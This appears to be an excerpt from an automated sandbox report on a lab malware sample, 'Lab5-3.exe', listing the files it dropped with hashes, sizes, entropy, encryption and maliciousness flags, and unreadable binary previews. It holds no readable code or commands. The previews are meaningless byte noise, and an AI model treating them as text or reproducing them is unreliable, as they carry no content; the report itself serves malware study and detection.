                                                                                                          SHA-256:AF85C0C396552FCF9678A749C3DFEEB66F0F4994557FFA58336655D1B07EF59A
                                                                                                          SHA-512:42A75198AB03A25A18DE5E658FFB28681A2ABCF7020673FE5462BD727FD3DEC32D4FE4DCB134289F52EC5E7425E3BDDF5975B14483EB976370ECBE17ADCCE905
                                                                                                          Malicious:false
                                                                                                          Preview:..|...)8./.YE..@&_x.....XvEw...Fl..|.V#.L.ml?...f...I.. .1....q.h@..U..S..w..!.~^.....Q.$...7:(......n...##X..)-e7H..1AN..N.33ty.M......q.O..;m).C..o........d(?..(.il>=.....^..=!..|.\$/..#...=.f.o.....t'A.K..|...n&.....M....{...HJ...uE^.2.....uc.J......B..wDN..F..=.Y..*?@.W....]tIa.G.r...Q...c.h...!....c...^.y.q.1..u.1......8.-.W+.7..Fu.(...2y...2@o=.}i!..}{..i~.....i.R..6...G+..4ffg.@B&%]'2c\_%...z+r|...."...+....bM.PKp...M.w...yL<.OX..Y/..H...U..3-.)zDy.|.f...c^...t....&.p.).Hy.i.... ."..E..J4.S.F..7%.,$.`.jM4.i"0G....-,..I{..j'.....t/o<.p..e./t.....r...8..6.c.H..._.~B.......bN:.Z.?N.Y.....b.IM..hC...W....<.~.....R._..C....:KH&. *.f...].j.q1...3..Qs 4.>S[......UU..y_;..z.m.#=...C.."...>X.a,.PiLb...m..../.#..f.....J$..0.9x..I.5.uT.<sV...Q.m}..I...Od._.U...>.B..rr..H;|O......'9.d.0..j.u.....cI!..#...bqVv.e..........}'[.>....S`../.KL..8.....c..3.u.,...#....Q1.I....P...Iw.\.#iN...N..8'..........\..AW(n....i......CQ0.75.~....I.D.27Q[.S.s..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):77440
                                                                                                          Entropy (8bit):7.9973451006261955
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:XWNH/FF0Wsz+Dn5zPtyHTnqkojCJpTDf+mdu9wcthKB0JavMqOOeDKa/BZ:X0/FDS+t7sqkgCnmmdkthvavMqXWPZZ
                                                                                                          MD5:A38C88B93D05F34B2698A7F929802A04
                                                                                                          SHA1:88795E9E59A72E13AA76ED5C48EED1D96040CC1B
                                                                                                          SHA-256:60F64935BD62B0F84CDA43835761EB9FA508D58F42D9176DBDBD7FAB6EBD10AB
                                                                                                          SHA-512:4B339413835BD5B3E58D2A05F3E43D25171F6FEF755EFEF9AAFBB2A5822D705324FE2743A5EC996F6ED0F684A54D06F964EE59AAC529919054967C5366A4795D
                                                                                                          Malicious:true
                                                                                                          Preview:..P..|...*.._.2b.....F....H.'#9.....*..?..!E.5..Mz....X....ca..j..../._..G...J.#....=...^E....p..0q.x...j.n..,.P...V..<........R.!b...g...zB....1D..J..=Y...V.e.8..{..V....tR<.t.0,Gh.k.dlok.\.ewf9...L....2l,.......}.......ze...%....G.w.z.....J.L.K. !....-T..w........{..X...O..6.m...+.G..N......|$....w$..|.]...CS.nh`..H...U..9h.&.._.bL].wj..._dec..#.....K..ok.....\.l..H..4h..S^.Wv...;e..q..z..:.[p..7.......6.t=.....A.=.!...F...r.Z.1..iL..[g..(..B......J.c....?.z..b....,.p.TT. .fn..B.53.]U..w2.,.-u..\....V9.\..~....j.....v(.p.W.......Xp....q...lV;.]...Q.".v}.4!.p.....VqS....+8..O.S`...m..t.f.mm..|<...#7_s.th..A\..P.l.....`@".6...L...=..5....}..h........y..}........a1....V..`.rv<e..xs...>.z2g../............hC.FQ......."..cp..I.K.!.I-..3...h.ql...Ed..,.]Q...(...L......<b...]i......?.I.|.6h..S#..f H.....(s.%...]5.....+..%e...B.r....v.=7.../_(..6./q.....?...R.....~..u...&E@......Ws9......>i....O...Y0.w....g....?....".Q........h..1vC..W.=....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1904
                                                                                                          Entropy (8bit):7.90307839159594
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lcNTm2y/TZCF0bHfUTid3hBaUoSGFcmeykEdEElU92i:lUSrZCF0oGx0uKeY2ElUJ
                                                                                                          MD5:1D2AB48D593689ACBE909D5010D835C9
                                                                                                          SHA1:812A07A4B6843706CCAE54E5D91B1B52B9178A46
                                                                                                          SHA-256:E51DC5ADF5BEAEE290FA08BA2DDD4F9CDB7958D7B667946481D6518DB2BC98E9
                                                                                                          SHA-512:797DD2C905E15BA38E3977186B97DAE04F9400947F1AA345108B6B3A9F644230279423F251E4C67E9747E6067F66D7A1B87740624D98D27FCBBE8CC411AA35C8
                                                                                                          Malicious:false
                                                                                                          Preview:..dM.#S...Rf.%..<.....y#.2..Mu*...x...I..-..v_p......]b.rx..v....n%..........l.F*/....!.q/. ..|.A.6.?G..y}.Fq...AM-|.........r.....$._......P...Rg.u]m..|la2!rX..l5...=.s..}k..+E7.EW(7@=.Mo.......,.n..7.......c...>.,...p..?...S.W..v...m..+.~; #......n;+0?v.s...P....4IXaB,f.......^.U.....s..-ZbJ.......e..`UE....`.P.2.I]...O...W..O..;..H.. .. .wS......BhK.......M..2-..P..&.r&.D}m{...~.X..>......o.?.`./.....CF...n......y....@W;....R.p.Y.*.../.f.K...l.........*3..zm.../..[YK...vkX%...Q.....l..#....)..Zj,.\.\c..'.....X|....._..Z.[..'hO.R...*...|....T..C#,....T.VQ`.>TL......A.F..H.A...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17808
                                                                                                          Entropy (8bit):7.990474439937491
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:nSMo0alx4vt5JEYBQ10zNj6b7GGF0AoPgw+wGzSN6/90UNGbdtb:SModx4VvJQ10zNjC7dF+H4zS8y3xZ
                                                                                                          MD5:1F9043D684FC330F6263A3CD58816B63
                                                                                                          SHA1:C8AA3E894602B5768CDE4F164EA501634F27EA39
                                                                                                          SHA-256:FC95211A1BFDB7B015C32DA977576799E036DE4A3CA0510B04427B32F54E0840
                                                                                                          SHA-512:C4BD0371D0B72A7386F14C0E5060D6E9E1BA285091A6B449AF4873D765A2C19E0B075D4D562BA94CA205AD133316D67D8D62FFFA6B927A88AA5106C4598FE257
                                                                                                          Malicious:true
                                                                                                          Preview:..V..rv.TV`.=.GT.c.._G.]..,....".g..'.~..2!.EC....^:.U..xe8....J....YW^g.'.gg.&....y/n.f..rb.. ..f.M.%...mT.#m. ..\....9....4*c8...G.y'|2.]:..W}..ld..F.Li.Y..).`.......4nL...?gz...S1F.gt;{`.}...9(..*r.q.....TmR$..aW....-2.X.o~3 Q)e....w4.S.)`.1......P4.J.ZR...09...a.U&X6..4{c+......6..X.F.....;......Z}....[.....2s.bgg.8.hT...t.~.{B.8...(S..504..~.^..6vAL..H..$./..b....B.)...).v0..V............K....n"[...`Ae....1-K.....{.%...:....1..lG...ai.K%..,.....W.0-^..W$.i.ET.cs.S[....(|...2.?~T;...@...U...... .i1.....~kC|...te..F. ...ro.7.ko.~..,.>.D.Cg....p....%dO.....|P..S..;..L?.Uy8...$.$.[7.A..x...c.J#M.}.9^+..B...m#.A.K..%..QY....n..]....Q....XW"..5...(....|..b...?.^R......?...M.H...g....R.n.MT.>..Y....I...\.V.m...'.=.V.......d.G.c..).:...N.........:}...xS\..0.$...e.Oh..|..p...J. ..q`.e...a.o[.....Iov..l......$Op.2M.Ic.L}..{.AE.i..Z...W....d9..&uPa...I*U..J..L..mbgm&...*.....%..R{^"$....c.[W.......h"....,..C.v]q.q....G....R..=...y.1E.[..{.j..3n#...yut..;
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12800
                                                                                                          Entropy (8bit):7.9879075023944885
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:cil7ulYNIpkR5x4Zz6ZsZlPf53gmfIxX/DsjmHoie0h0SlINIv3VE0Cb:cilxhd4ZGZkdxfoD0vA0SlXutb
                                                                                                          MD5:2B05B0370069EDC285055BC2AA4857B8
                                                                                                          SHA1:B5D0F70878E4862B28C7DABF3317AB9549C15A6C
                                                                                                          SHA-256:9BE5FBE78C11AED91116B2CE5CFC828E582649BBB13303C6E68BAB06FF0A9E66
                                                                                                          SHA-512:0E20DF46374EDC932D67F5E46402E658DE0F502AF2434065963B14C6674594505C7FD49A1D07CD29CF2876A2C37E69B9562E99F40C9F8E2FB50668A4BB381C4F
                                                                                                          Malicious:false
                                                                                                          Preview:%.~...<.U.r...j.4...&7...... .....$......#...-.).....p...+.H..`..%.)cj...p..X....8[..f........fO.[`..I...D...=..v_0imA<@..../......S..Kd.......?m.....g......~q.Cre..nf....v......V%...Z.f..m.....7#.M..Gv.....=.;%9..tn..5...0....kQ....U.{.!A.E..E.."..&.2L..%.+CE..D.....C..JQ."!P..@.....0$..y;..I......{%(..*)W>..rK.....>...3*^.... J....."..P.6..p..P..Ov]<.k;....."...`.;......\...a-xH....Sa.Q..`y..n`t.%..X..=dN......<.).....8k.k...^G=\..-.....9.Z..\tM<...Xh{...f......./.*#.('H..L..70{.j.._....v^.."....I$5..e...[Y...q.....kGn...x......:.Q.....8......YI...O..........d..7N.V.L;...t8.4.XycX..OG...N6....kh_t....].2!`........E....S....T.....:}6,Yo...<K....jBTBu......nr.....".+K..Q.z~GI.{...../.-..(Yy.R.j..9.ot..n...I.....;C....;.N..@..uC...u\....>..UzZ.<.CR..m..Zo-.(#.....I.1]t..^..{9......D?...;..t.aM4...(..t.ZrA.........V`,......'.E....y-....=w.XO..$.u.iKb,..`./.Q....m...dwb<P.r....g...s...spa....D.....-.F....^&..YXJC......bNh..&..Y...<....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4352
                                                                                                          Entropy (8bit):7.9588372977393105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:xozHx84OdfdzEYFy6A7zMALFw3cJKuZfGx0uKeY2ElUJ:8/ofdzjyYGWcJKuS0Cb
                                                                                                          MD5:0E399FE0827A3EABCDA44320AFE74823
                                                                                                          SHA1:86EB6107796BC06953B665EAF2810F46F005D07C
                                                                                                          SHA-256:80CE4604193B99D3DB7BFF6B6EF06EAA8819012BA9482DA4A6804B5A8E477992
                                                                                                          SHA-512:8680945FA3D7B576B7464F09DBBAD98F19C63E5B084BDB6BB83C415EE59662BDFE1154767464A4264604F18FEAA8B9102FD60276D1E384582AA67A09579DA7E6
                                                                                                          Malicious:false
                                                                                                          Preview:...U..].b.QC...9.aA0g.^.....d...O..e.o7'.~#.q...Z...}U.../.I.n..E.....2k...k&`.^x.3Lkc.g.XnKAX...E..b/....w/..Z.zZ.........gC.....s..g..G...n.a..>.z.m...J.n.)\s1...`}E.^.N....$.....H.U(]c....+_%..mL....R..f........a..........}/6w7*..V....&.W..H.K..Q.......(..Y_r.....?.C....xD;!t.ku.....sM.".g.<Gy.r..Z_@`v91.[.(.....X..e..x\3....v.?...u......_...s.j,..:e.\j.V......eT.Z...;V.....]._!T.^..T......%...($..JL......Z1.8...$. .p.......C..c...`WA...]s..#.(.q.a.iu_.We..D=.U.f.....*.G.a..J={2K.F@.H....<$.,.-.U....u....u.d.........z.QL)L..d.....@.".....4...!...jj...P.%/.V......F......vD.!8.Y...S...!.9=.mx.}#...S.b.asz..Q...L.D{.e.g(.\...c.\.......Q..r~.,.S.[KQ.O78}.4].t,P...g.s...7....}....Q....v.Z..sf..q>..b.&#'*#4.....1.p..1m.'._...b).>K.i.*.:.7..bn?.nE.N.R.y.!...$.W.V.LY..N .|b..I..\...../.&.%....mzd..?.i..s..=H.4..F;..?."~:4....N....|E..M...z..>...^.:,bb}_..cS.QV. Q...w.3V.....$.o......q.S.H..d.^......Z8.............16Wr.(..2...t,.[:2o.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12592
                                                                                                          Entropy (8bit):7.986494602173454
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:HEBIJFZDy7ltWD/YIfowjyq8KMKnT5ItrQbBhjuOdLGaWLOoePtfSL5rk8r4w0Cb:HEVxtw4wjyJKMC5ItrEF4am4G4wtb
                                                                                                          MD5:1A72AAB09C2F85C51BFEF949E837DA19
                                                                                                          SHA1:E2A8E59EA065D264B3F546D0BA258A1C5C794A14
                                                                                                          SHA-256:B7E7411EEFB369AA7E0CF0333F0366C80ADABD9B2AC9957AFA9C8FD834F96FF5
                                                                                                          SHA-512:DB2A4380402CE819AA6C570714154CFF567783E9480C3AA2C897E570B2239CADE45773C091DA865517498FC37AB6B819EB5BA031FC1BDD0669B5F6452E7FB153
                                                                                                          Malicious:false
                                                                                                          Preview:..u.. ....jw1....+...HVY....C.C.F...1.d!..$...D60.V....w.wK.....g.o@0..T..;..1...e..f.&#p3=o_...S4.....F..b...p..n.J..P....b...>..'..e.{~?...R....S..|5.....a('.....6...W.m{.y5.e.Xi+_....'.....C...E...}.w.vs`.+...V........I........&.+.oN.........J#......JoZW...P.R...W=h.2{C...@...5.F..-~..x.3"......."..z...."....l.1.df?.g.:...v.&.''.:.6czmmB.4r..?%...._.Do..9~...U...:..."..U.w..M..}sz...(.r!....;..[..}zT.{.....7""...M...3.O....o.aAg.1.O*...<.*+.H.A.d.iU.C....nww....Obz..@.q.p...W~....9.$o+~..ret....Y t...R.\...F.s.L.....~..........L..e./...iow..s.!2.r..!!Q...Ow<.&...L.."..`...=0M.L....I..}h..V.VkR...3[s$..)..`.....%...e.S.`....H.m..jkL...,..4L..Z..Q..LB^&..0.....0.LCEa-9.*.Xc..~.E..G...... .@W.k.....YD.z..G....ZV...\.>ra^.Y...d.k..!..P..%.N.&......NI...l5...GP.s..U3.-.`A.=.J.......P.......R ..D...>kk|.2....adE.".K4.s.D............N....h.X.......:%. _v.q2.B&b,~.Ks..;.A...n..<.0.O.\..4..Qn.?.94.n.o.s......MNhqG...I...~.a*.Xn..a>TE....y.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28832
                                                                                                          Entropy (8bit):7.993730711148641
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:6eAdDCPLOAOCnxzvacpTogzpkxK5+xGH34Dx+W5vZ:nA8OszvjpkD5xGH3s+WFZ
                                                                                                          MD5:3949D0358E7C1676BCA30A81DE53F009
                                                                                                          SHA1:0618FBED3BED82C9700050574160ADD9EEC1336D
                                                                                                          SHA-256:54DDBF79F52594B86BEEE011B6A9D031ABA5C9B9C84B5CC4E44FC1269075FD8F
                                                                                                          SHA-512:2B2CA60DB0C28C26FDC7920EA9ECE268935F00D65E3C5E03F1DA5EEE1872B94A167C085EF16EF216F241EB4744C3D48A7CB57AE71F06D717B85B8C72450D7FEF
                                                                                                          Malicious:true
                                                                                                          Preview:.J.rc=.{..G.......I...p..Y&#p..K.!..........Y#>yhr._sO...U..b..@.H.zb.A19..M0.[2..:.......y.B.^<Z!..f...i..j..o........od..s..<D.. ...0....Kt.|.3...]...).......c.J.(Vl..........@>....Q.|...3.. ...E(BFH.M...t.`!j.G.HHN...%..x.J.9l..D..jP)D..(x.....|...=..?.....s.".!l..6..!.{.T.vy.Kt.....g.O..E".....I....Y..2..z....u....N.........."..O....7..s.........=.8z...KD@$oVT..O...........'..4x...".... .~6.....w.k+....$../.|.T..K.v.O}>.';..q.0[.%;..H.7{R......@.....k...|....\....bO......7jO.=..dg%.&......a.......|X.F.!..&.\..d.T...G....a..7..yC-;.A..in.,.e../8;"\..9.g.J`..fm..p.>_..Z6C.)wY........x.8...a.e..#p.N@q8.T.2......+.....c.l.]h...w...B.a-_..u.`?...t}...=....$...(..gv1........1u....W......u_.5C.o.'&$8B...X.{.....es.@_.....2 ...Zp....S3.IXj..?rSV.....cwc.~.Y.I..+f..\....gE.@....g.Mm......u.I.......P.U..t..."..OE@...He3i.....=+...fi..uKU..5?l..S......$.28..$H.\........V...s.C.;WdM.z..h.u2....dJG.L.XF2...)l..=f....?..4H.~..q..F..t.5..{W..?
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13472
                                                                                                          Entropy (8bit):7.985479454649486
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:GsaraXKdMhgIqbucJAY9JnwPzvN+lqIKxdjTnSTuWtb:T3KOEbh/ibN+0vdXSTlZ
                                                                                                          MD5:B326BDC180119AABEBB04F10C0F5A32D
                                                                                                          SHA1:2DD35CA243924B3DD2A98F7A1F8344D1B9D65A33
                                                                                                          SHA-256:95EB13688F91685CC5F580C20D391C4A15A51463DAF985622715992DA3492335
                                                                                                          SHA-512:2FDE18A7660CA881ED15F1E0A679CBD20416F5B31D88592E16A1D88C178C6957D90E2DF1740CD21B9125204680DC26F58CDF3A44AFEE0E76C3FE8129FD29D686
                                                                                                          Malicious:false
                                                                                                          Preview::c.Q...v..(..0.H..m..*.....p.M...[l.u..Hq... .CdLq....c..)_..]^..+...pG....T+`...~...AT5..Q..K...u..\.....x.P.....V/....K...BJg...T..$.mW.zP.R...g......9q.....%.s....c3-...'....;...oR~t..`.C.N.e...F...a..4..,.B..J....=.u.l.N..."5..j....d.l.......#.^1..278....u.!.4.n.......#.............o~nD;.."C..T..G.&G..^....n..sB.i.r...V.|..H}5TK.&.n'..Yq...9R.0f[Z.$..JD.....+...xS1-YU...0..M....3..i..gn.q...J...].....H.. .f.K.Rz....'..H..\}....}./.O........Y...2..s..V=......}..N.\3..-..+.2.......8tf..q........X.@.......R.........p.u.3._!......\.=".yN.Q.i....1..6...z..N..!.....IY.F...2.a.O....4.K6..C..,&...$j.......9U...%N.*...7..K*.... .97...b.<.H..Z.f.w6..w.U).s/"....eQv..."...d.|...'S7.y...w....2{.._...~....Jf..=.......jU'i...s.;g....JN..uEW.2.n.Yj..E..Y..xa..@.1.|..4..n^..fFq.hP,......`.N.>/...,<.7.t8.?/Ur....g..<.aV(..d $k.I. ~...iK6Ql.P1..~.&A..I..D).4..z...45n....$J!.VhC.+..q..0.\..N(o.....a"......@bY..5se..Q..F?....u.X8..m.<..D..`X.b..~.6..1.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12640
                                                                                                          Entropy (8bit):7.983660080796229
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:ZDSqmLbKGPJMd38ZzZE209XUgZOb4qD2F7KgPKtb:ZhmPKWJMdQZD09XUbBeGgPKZ
                                                                                                          MD5:6756D868B029A24E728FE98F2E9C147C
                                                                                                          SHA1:26DB973BEDE53367E03508956D34BA59AB14FBD6
                                                                                                          SHA-256:83F73E0B47D9626B7744E59AB34485068881D6495AF46824CB532244CCCD1667
                                                                                                          SHA-512:A167D78E489FB3485CE03F3CB5DFB332D2ABED998FEE51C6A741B381481D8587DDCB699AA97AF129C194CF9686F4F5D4EB08681FF4875C7188ECAF882CC304CD
                                                                                                          Malicious:false
                                                                                                          Preview:..VH....e....:1.s.d...^.>I.B....p...)...hp..J..u...{. Z...).J.O.-*.5S05.V[..WU..(I,......\..)BU..qm....tb...I4.<.dA."..z..FG.QT..F...Fw.5...d.f.m.w...wMq..Fy....I...p.q.G..[[........iQs/1._.D............NP N....G.~:.I.....9P)^...B..k.....Ajl.I.K../.:.O..+....l.m..w.)....dM........)..9../..........f>..@....vI...t.%...p.....T.8S...U.i.......4.#..8%.b.]C.V.<..E.}#.../"...0....8....P..".'LE0..(...?p.^.P..d.!.....WS..a...v.\....x.~6.....BH.CR..#6)...P....k$....a]$&...&m..,(...7...c..6(...Oz....jX..../......v"j...a.~...O.\...H... nZ..k_..c....V...l.d- .,j..!.t..:.....yK.$..r.....{..'...................Q...S.#...3.Q.^..+.{._.&...DG.I..;+..-.<...BR.X...H.s.Y...O..<...5.i...N.&H...sn_.?.B..h.F.)ox.1......Z.1.........f..2.z......D..R.VF.M...k.6.5.G..^~w.}..;..8.|...:.`..^.'.h.... .#.........B.{.&^T...Y.....-"...T.h......^.....h.Hd..R........a.C.N..?....(.......mo/XZ%9[..r~...(..z...T.\.9....2o.zr.2K...@./...|..r...C..K.u..b.d..V...0.5....A
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18336
                                                                                                          Entropy (8bit):7.990790155375885
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:GwgJKnTQUuto3xQFppcKwqZycafFJiwJzlFdOGDHIal0MTE6ktb:8cTmt6yOcafvrlX/LTE6kZ
                                                                                                          MD5:96C317B00AF0089E4E2578475568D0F7
                                                                                                          SHA1:40B7DBA53122100FC0C7F435C2E8D0E1B19FDA1F
                                                                                                          SHA-256:6D82A09C8FDE3C20426AC9A9C23552294B187B02BD68E08AA023263EDB921EB6
                                                                                                          SHA-512:D2EC2E08E5B39CF6C409830F1B4085B8BA56E46C41D1866B166718818BB02AAAFE8DDD5034EE8BD7639B87966111EE2DF61306FE343CC7D3952225C668CEEFB3
                                                                                                          Malicious:true
                                                                                                          Preview:E..]../9.."T........".K.O...m|.....=.g..*....W.bT...U2....k.....x.........uF....g.!.T}...N.$l...+u.@+.5P...t.UW`......./|.%..-9l....!4n..-H.&..#$....F..T!64X+H.....#i...y.JHY.M.l..'`....'.s..H;#|...,."....\...l....*.q..E...:...._.q.#.g.....5...Vs.{>IRx%U......O.:#.X.p......U._..CV....sscl.....xy.GZ..r.O.>fZ. ...z...x.....e.6Edo+..A....3&.Vp...u...%....d[..9e.T..:o2...j..RCM.t ).#.......T...cu@.[..=.D..2.5&.m._......BiC..,..n;..c.R.F.c@.+<..b..R)g.$....(.2..zU............y.=.7Igr.....o.a..~.-........^....p...4.g.....E.^..KX.5.fJyM@C...5...z..c...\.K5pF... ..d..sh.`k.......[..\.X".E1...i..A...r.......v.J.6......T..q.l.{4......4../.s.\A!{.......`}..<.od&.b.=.....K.h.E<.v...5......._.c........f..{n.)kw.:.].....D..7......O.g../Z..u0.-I...a.{t.L.#...p:...$..I..[7.t....XJ...B.r.....9.K.._."........M.#......LqU.C......CB.+.}...z..y.l".V.|C...';.X.iZ.BW.>`..W.(....~Z..&.v.....LA..m...3=..0."..(*....3..w...Z....q..........Wy../....L4uQ3....9(.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1904
                                                                                                          Entropy (8bit):7.909007640758052
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Y7nFR1dHfUTid3hBaUoSGFcmeykEdEElU92i:Wnp2Gx0uKeY2ElUJ
                                                                                                          MD5:E1426892A645A313A28D296CDDCAE7EA
                                                                                                          SHA1:2A475953F3F44074BFB09FA2D500059D45039FFB
                                                                                                          SHA-256:12F8D149CAD450DB6621A42FE2DBB40EC444D02754F8CE30EBDE69E23AEF6652
                                                                                                          SHA-512:BBE299C671D0F0623C43FF13869E5A80AD275FAD5F98FB1DB7B2E435202BD4D8CC133748B0D3FD41C5E7817F9E0380DA543643324161051501962989496235C5
                                                                                                          Malicious:false
                                                                                                          Preview:4.....\|......1.%Bc....Do....r....>.8R.X.Y.`...42f.<1...C...HG.X.KQ.........z.i.X.V...q........)M......Z..d...Q.E.?...."W..S.U..N .]~.R...l$.e#=..KG.....j......g/.H.n........?.)..V..S.h..dS\..C.y.C%*.| 1.W..@..QH..A6...z.j.....AO..q.7..:..e..W..q.u.....[.<........0g$n.*...Nr.ye.!..Hj......L.........;....&.....>7.]...a.C.N.7e0.....*{.V....'f...:1..J.-/.....{..KY.2{.......V.......E5H..x......2.{.[L.%.f.<.......8.L!.y(.|.8...... .i.un...(A.BE.R....b..y[[....n.....Wn....}..+.........2Wc....,4......y.i..i.|K...q....-./...........W.uM....W.Q ....&.$...f.'@...>.1..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):29792
                                                                                                          Entropy (8bit):7.993611763059593
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:7SCCOIVqKvsCSpwzfJzS4b0BBX0rDcBxi9g/VqZ:7xCOkqOs7wzfJWZWDcaKIZ
                                                                                                          MD5:8C443411678575989324160FCC869850
                                                                                                          SHA1:B37388E606B0F59DB94D169B34AA9BFF2DC650D7
                                                                                                          SHA-256:EA283E2835AABFEEDFBB827B38352C36C061D159CDD61BEE91C17F41E48ABF49
                                                                                                          SHA-512:C83F63468B56392ACE46E6607682E3657A50C68AA4FE7761C49D75DF7491B196139786006729F38FCDC8258F0EC3821D90CB9422ACC15E35D33273357ADC4B1E
                                                                                                          Malicious:true
                                                                                                          Preview:"...Yh..]..OH.......}.g.hY..X`...P@N.......L.k.kY........xR...n....~.U..y...S...Z......:.L~......3....[...].....u....'...4.=.........E/.....]&|^.n...5....O+.S.......&5Q5|V\w+..........I%.e.*@.f..>iD...J./.L.t.d.n...j>..n....=X.J.Ss..._..r$.2i7z....U.....i.*......T.#0T......kY...8.].5:.+8...:`r.QH....B.g...|d.g..v.&.. .{*..rd.....1.q.k.-SU ..d\.C....R....'.6j.q.S..........13t.AAk..U..5..[.&.4....51R*.+.G.{..O.=...n(.<...S.e......O...l..b.9.....;.......k.k..J..$.....E|......<.......0..m$$........[..4$Q..K...H...s.'..Z...\.<Z$~]..q.5...5...R.. .R(.CY$e.r..k.G...'q.....>....c...T.65)P.u.qr.....L...a.V.dc.....C4.d\...c......R.......|P....\q.....;...1.*..&..(.../..g. ..7.H...sh.T^.6.w&.Q.{.#x.SP....4:M.9c..L......=.....L.w..............s...8.|a...5;.&..".".3.W ...d...o..-:..!.C..8f.z.O..zy..6.O....%7....OE...m%.i.0{}_..|^...c...$.3hv.">E.y?4gZr.V..;.......Y.3.+..c.5]..-..3...{T..RZF.{.....~.x.^...Z..2\.....I..D..uI~.66
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12592
                                                                                                          Entropy (8bit):7.9864691165377435
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:8bJaLZ80xTyK8CNQ8hTGcgul/ew9lkxAIcq57gqFQKXoHSF0Cb:PLC4TyBCaOTG0/NixAIcaPQKptb
                                                                                                          MD5:B10262AD63BD0A561E24CDF6356A5049
                                                                                                          SHA1:E5FB3BF5E9D0874997E6CAA2A94494867BBED5EA
                                                                                                          SHA-256:4D5B09EE97DD3AF9F49E44C0263A456756DA9C38CA9E7BD79D6886CE3A45D7CE
                                                                                                          SHA-512:8B2E909385F675DF5AC4B7FFB84E46A2FCA0425C639206C579A67637326773764AAA57B5732644785C8271C1322B1507B048847B9F8B24D54A8DBA5D0792A21A
                                                                                                          Malicious:false
                                                                                                          Preview:3.r..[....*.p'.....;..%..7U.....1.<zA#t..mK..P.@...#J_../.~..S...8L..e....q.U...e..@.!#.....p..-&..<t/....j.O....^.{[..=...PR=..X..Tr....l....J}..............{.RU*......~}.......n..5.z$%*.......W.....@.$.a...N.k.&...Ez.X.Z.-.N..3|SN.V{s..5.....4g.R)..cL...p..j.^...aI..&C..o}....!..`...4T.w.(wx~.dk.\?v.....w..D..N.y.k.'."..(......9...........q...|O~`U.M......E....D.....Jj...Y....9..r"..........G.....V... wT.z..@%A....&.....&..@^s..^.-1...u..f.*^...+.\R| .~..K...R.......8%..IG....T...'..K.....=.p....!....V.Tt...(m.e$$....?.H5.5b.p...v.Q(p.l4...3...Ckvl... t...H..F..j."....b.o).........T....k.@..K[.........'.>jP..1S.6....&}..|64;...f.$.5f..4.j.+;*:Gv...g)../.....X.O.Bc.p...=X.L*..u..:..ntN.3Vu.J>1. .E......N.k*T.CJ_.9..@....Yaw.&Z@...b.u....+..6...Q.....:.....!.....k....\.. ...^.~KoC!.C...nK.{....s.a..."+...$.Fc.K%/.k.2.{`.... ...<..^.....$ve.\.5V.0.E..a"..D.99./..l....UD....'.,...,..@AH\...;.eNpJ...Z....;...p.....R.........".j.y %.c .r.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3408
                                                                                                          Entropy (8bit):7.945336128755011
                                                                                                          Encrypted:false
